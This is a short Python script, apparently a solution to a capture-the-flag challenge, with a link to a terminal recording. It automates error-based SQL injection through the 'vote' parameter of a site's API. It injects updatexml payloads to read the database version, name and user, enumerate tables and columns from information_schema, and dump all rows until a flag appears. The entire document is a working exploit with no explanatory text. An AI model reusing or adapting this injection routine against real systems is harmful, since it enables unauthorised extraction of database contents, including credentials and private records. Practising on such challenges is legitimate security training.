https://asciinema.org/a/U7Jh4I0Pwh7rlThRgK1AsCYuO

challengeSHL.py

from bs4 import BeautifulSoup as bs
import random, json, sys, re, requests as r 

def send(payload):
	s = r.Session()
	datas = bs(s.get('http://challshl.com/').text, 'html.parser')

	token = datas.find_all('input', {
		'name' : 'cans_token'
	})[0]['value']

	result = json.loads(s.post('http://challshl.com/api.php', data={
		'vote' : "' {} '".format(payload),
		'cans_token' : token
	}).text)

	return result['result'].split("~")[1].split("'")[0] if 'null' not in result['result'] else result['result']

def x(x, y = -1):
	sys.stdout.write("\r%s" % x) if y != 0x00 else sys.stdout.write("\r%s\n" % x)
	sys.stdout.flush()

temp, builder = [], lambda query: "|| updatexml(0, concat(0x7e, ({})), 0) ||".format(query)

x("[!] DATABASE INFORMATION...")
temp.append(send(builder("version()")))
temp.append(send(builder("database()")))
temp.append(send(builder("user()")))
x("[INFO] version: {} || database: {} || user: {}".format(temp[0], temp[1], temp[2]), 0)

x("[!] EXTRACT TABLE...")
temp.append(send(builder("SELECT concat(table_name) FROM information_schema.tables WHERE table_schema='{}' limit 0,1".format(temp[1]))))
x("[INFO] tables: {}".format(temp[3]), 0)

x("[GET] EXTRACT COLUMNS...")
n, m, columns = 0, "", []
while 'null' not in m:
	m = send(builder("SELECT concat(column_name) FROM information_schema.columns WHERE table_name='{}' limit {},1".format(temp[3], n)))
	columns.append(m)
	n = n + 1

columns.pop(len(columns)-1)
x("[INFO] columns: {}".format(', '.join(columns)), 0)

print "[DUMP] all columns ({})".format(', '.join(columns))

n, m = 0, ""
while 'SHL' not in m:
	m = send(builder("SELECT concat_ws(':', {}) FROM {} limit {},1".format(', '.join(columns), temp[3], n)))
	print "- {}".format(m)
	n = n + 1

print "[FLAG] {}".format(m.split(':')[-1])